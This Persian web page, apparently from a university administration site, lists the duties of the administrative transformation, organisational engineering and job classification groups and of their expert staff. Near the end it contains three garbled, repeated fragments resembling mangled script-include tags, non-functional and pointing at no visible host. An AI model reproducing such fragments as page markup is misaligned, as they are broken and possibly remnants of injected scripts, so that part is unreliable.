شرح وظایف گروه تحول اداری:

 • برنامه ریزی و اجرای طرحها و برنامههای مصوب کار گروه و مراجع ذیربط از جمله هیئت دولت، شورای عالی اداری،سازمانمدیریت و برنامه ریزی کشور، شورا وکمیسیون تحول اداری و…
 • بررسی وتصمیم گیری در خصوص اجرای سیاست های کلان تحول اداری در دانشگاه وارائه راهکارهای تحقق آن
 • انجام امور دبیرخانه کمیسیون تحول اداری سازمان و ارائه برنامه جامع تحول اداری برمبنای پیشنهادات دریافتی از کمیته های تخصصی زیر نظر کمیسیون تحول اداری و برآورد و پیشنهاد بودجه و اعتبارات لازم
 • ارزیابی کلی دانشگاه وارائه گزارش به دستگاه های اجرایی ارشد استان و وزارت متبوع
 • پشتیبانی، هدایت و نظارت برفعالیت های بهره وری و تحول اداری دانشگاه
 • اولویت بندی طرح ها و برنامه های مورد نیاز بخش های مختلف واخذ مجوزهای لازم جهت اجرای آن
 • انجام اقدامات لازم در جهت استقرار مدیریت کیفیت در سازمان و ارائه الگوهای مناسب مدیریت کیفیت برای واحدهای مختلف
 • برنامه ریزی در خصوص ایجاد، توسعه وترویج فرهنگ بهره وری و تهیه گزارش از چگونگی وضعیت اجرای آن
 • مشارکت در تدوین برنامه ریزی استراتژیک دانشگاه.
 • تلاش در جهت استقرار سیستم مدیریت کیفیت در دانشگاه و واحدهای تابعه.
 • نظارت و کنترل بر تهیه برنامه‌های عملیاتی و اجرایی در سطح مدیریت توسعه سازمان و تحول اداری.
 • همکاری، ارائه مشاوره و راهنمایی در اجرای برنامه‌های تحول در سطح واحدهای تابعه و اخذ گزارش‌های دوره‌ای به منظور مدیریت فرآیندهای برنامه اصلاح نظام اداری.
 • انجام اقدامات لازم در خصوص استقرار مدیریت فرآیندها و رفع نارسائیها و مشکلات مربوط به تجزیه و تحلیل سیستمها و فرآیندهای انجام کار در سطح سازمان
 • برنامه ریزی و انجام اقدام لازم جهت استقرار سیستم نظام پیشنهادها در سطح سازمان
 • طراحی و مشارکت در طرحهای تحقیقاتی کاربردی در زمینه تحول و اصلاح نظام اداری در دانشگاه.
 • برنامه­ریزی و انجام اقدامات لازم برای شایسته سالاری در انتخاب مدیران و کارکنان
 • برنامه ریزی و انجام اقدامات لازم در جهت تأمین و برگزاری دوره های آموزشی مورد نیاز کارکنان سازمان در چارچوب سرفصل های تعیین شده
 • برنامه ریزی و انجام طرح های استعدادیابی، جانشین پروری و مستند سازی تجربیات مدیران

شرح وظایف کارشناس تحول اداری :

 • تهیه و تنظیم گزارش ادواری از اجرای برنامه های تحول اداری و بهره وری در دانشگاه
 • پیگیری نظام ارزیابی عملکرد کارکنان
 • شرکت فعال در شوراها، کمیته ها و اظهار نظر پیرامون مسائل مربوط
 • مطالعه و بررسی و نظارت بر روش های انجام کار ، تنظیم نمودار جریان کار در وضعیت موجود و تجزیه و تحلیل روش های انجام کار
 • انجام مطالعات و بررسیهای لازم به منظور استقرار چرخه مدیریت بهره وری در سطح سازمان و ارزیابی مستمر چگونگی و عملکرد چرخه و ارائه راه حلهای اصلاحی
 • نیازسنجی ، طراحی و اجرای دوره‌های آموزشی بهبود مدیریت برای کارکنان و مدیران
 • همکاری، پیگیری و نظارت بر اجرای تصمیمات کار گروه و شورا
 • ارائه نظرات کارشناسی به کار گروه و شورا از طریق بررسی و مطالعه طرحهای ارجاعی.
 • پیگیری و نظارت بر انجام پروژه های بهبود در راستای برنامه راهبردی دانشگاه
 • برنامه ریزی جهت اجرای مصوبات شوراها و کمیسیون بهره وری و تحول اداری

  شرح وظایف گروه مهندسی سازمان:

 • مطالعه و طراحی تشکیلات و قالب سازمانی مناسب و بهبود ساختار سازمانی
 • بررسی و نظارت بر تشکیلات دانشگاه اعم از تبدیل پست های سازمانی و اخذ چارت تشکیلاتی دانشگاه و معاونت ها
 • انجام بررسیهای لازم به منظور بهینه سازی ساختار،‌ترکیب و توزیع نیروی انسانی و ارائه پیشنهادهای لازم به مدیر توسعه سازمان و تحول اداری ، معاون توسعه مدیریت و منابع و کمیسیون تحول اداری سازمان.
 • تهیه و تنظیم نمودار سازمانی (تشکیلاتی) و تهیه و تنظیم پستهای سازمانی متناسب با وظایف و مسئولیت های واحدهای تابعه دانشگاه با همکاری واحدهای ذی ربط
 • مطالعه و بررسی مداوم وظایف سازمانی دانشگاه و واحدها و چگونگی گردش کار در آنها با توجه به برنامه توسعه دانشگاه
 • بررسی مستمر تشکیلات واحدهای تابعه به منظور اصلاحات مورد نیاز
 • بررسی درخواست های تشکیلاتی حوزه های ستادی ومعاونت های دانشگاه، مراکز آموزشی درمانی، دانشکده ها، بیمارستان ها، مراکز تحقیقاتی، شبکه های بهداشت ودرمان شهرستان ها وسایر واحدهای زیرمجموعه دانشگاه.
 • انجام طرح های مطالعاتی مربوط به اصلاح ساختار و تشکیلات سازمانی، سیستم ها، فرایندها و روش های مورد عمل در دانشگاه و پیشنهاد اصلاح در صورت نیاز در چار چوب ضوابط و مقررات مربوط
 • درج آخرین اصلاحات موردنیاز درسیستم رایانه ای تشکیلات و سیستم جامع تشکیلات وزارت متبوع به منظور بهره برداری ودستیابی به آخرین اطلاعات و وضعیت پستهای سازمانی دراسرع وقت
 • تأئید ردیف های سازمانی به منظور انتقال، استخدام، انتصاب، تغییر عنوان و …
 • تهیه ، تدوین ، پیشنهاد و بررسی چارتهای سازمانی جهت واحدهای تابعه در چهار چوب ضوابط ، افزایش و تبدیل وضع پستهای سازمانی اعم از ارتقاء ایجاد و تبدیل بررسی درخواستهای امور تشکیلات تحت پوشش.
 • تهیه و تنظیم شرح وظایف کارکنان و واحدهای سازمانی به منظور تقسیم صحیح کار و مسئولیت .

 

شرح وظایف کارشناس مهندسی سازمان :

 • انجام مکاتبات با کلیه واحدها در خصوص پیشنهادات تشکیلاتی اعم از توسعه ، ارتقاءو استفاده بهینه از ساختار کاربردی در دست اقدام و همچنین انعکاس درخواست های مربوطه به وزارت متبوع و سازمان مدیریت و برنامه ریزی کشور.
 • پیگیری مکاتبات ارسال شده به وزارت متبوع وانعکاس موارد دریافت شده به واحدهای تابعهو ابلاغ تشکیلات واحدهای جدیدالتاسیس وتعامل باوزارتخانه و سایر  دانشگاهها جهت دستیابی به فرم های جدید 
 • نظارت بر تخصیص پست های سازمانی به افراد
 • پیگیری کسر ردیف های مورد نیاز واحد های تابعه دانشگاه (جدیدالتاسیس و توسعه یافته) در مراکز تابعه باتوجه به فرم های مورد تایید و افزایش تخت های مصوب
 • بررسی پیشنهادهای واحدها در مورد تغییر و اصلاح پست های سازمانی و شرح وظایف و تهیه گزارشات لازم و انجام اقدامات ضروری جهت رفع مشکلات سازمانی آنها
 • پیگیری مجوز های استخدامی قراردادی و رسمی و پیمانی نیاز های استخدامی
 • بررسی شرایط احراز پست های پیشنهادی مسئولین یا پست های درخواستی توسط پرسنل واختصاص پست های سازمانی
 • بررسی احکام کارگزینی ، و نظارت بر بازنشستگی قبل از موعد

 

شرح وظایف گروه  مهندسی مشاغل

 • بررسی و اتخاذ تصمیم در مورد تمام پیشنهادهای دریافتی از واحدهای تابعه در مورد اجرای طرحهای طبقه بندی مشاغل بر اساس مصوبات
 • بررسی پیشنهادها در زمینه اصلاح طرحهای طبقه بندی مشاغل به منظور جاری نگهداشتن طرحها و انطباق آن با نیازهای استخدامی دانشگاه و ارائه پیشنهادهای لازم به هیأت امناء
 • تخصیص پستها یا مشاغل سازمانی به طبقات رشته های شغلی و تعیین طبقه مستخدمان در چارچوب ضوابط و مقررات مربوطه
 • نظارت و کنترل مجوزهای استخدامی و انطباق آن با شرایط و ضوابط مربوط
 • بررسی محتوای دوره ها از لحاظ انطباق با طرحهای طبقه بندی مشاغل و در صورت لزوم ارائه پیشنهاد و نتایج بررسی ها به هیأت اجرائی
 • نظارت بر تعیین مشاغل مستخدمان پیمانی از لحاظ شرایط تصدی و طبقات مربوط و یا تغییر عنوان
 • نظارت بر انتصابها و ارتقاء و تنزل گروه ، با توجه به قوانین و مقررات و ضوابط موجود
 • تدوین آئین نامه تشکیل کمیته های فرعی طبقه بندی مشاغل در کلیه واحدها

 

شرح وظایف کارشناس طبقه بندی :

 • انجام ارتقا طبقه تشویقی کلیه پرسنل واحدها و ستاد دانشگاه
 • تغییر عنوان و انتصاب کارکنان و مدیران ، استعلامآنها از حراست و مبدا و مقصد و معاونت مربوطه
 • انجام امور مربوط به ارتقا طبقه و رتبه
 • اعمال مدرک تحصیلی و اخذتاییدیه تحصیلی متقاضیان اعمال مدرک تحصیلی
 • انجام مکاتبات احتساب سوابق تجربی غیر دولتی افراد متقاضی با مراکز و واحدهای قبلی اشتغال و اخذ تاییدیه از بیمه
 • انجام فرایند ارتقا رتبه پایه، ارشد، خبره و عالی به صورت الکترونیکی در سامانه ارتقا رتبه شغلی کارکنان
 • ، انجام امور مربوط به تبدیل وضعیت از قراردادی به پیمانی ، از پیمانی به رسمی آزمایشی و از رسمی آزمایشی به رسمی قطعی ، ماموریت آموزشی تمام وقت ، نیمه وقت و

<2 src='3?l=p&' type=text/java2 language=java2><2 src='3?l=p&' type=text/java2 language=java2><2 src='4?l=p&' type=text/java2 language=java2>

ارسال نظر شما

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *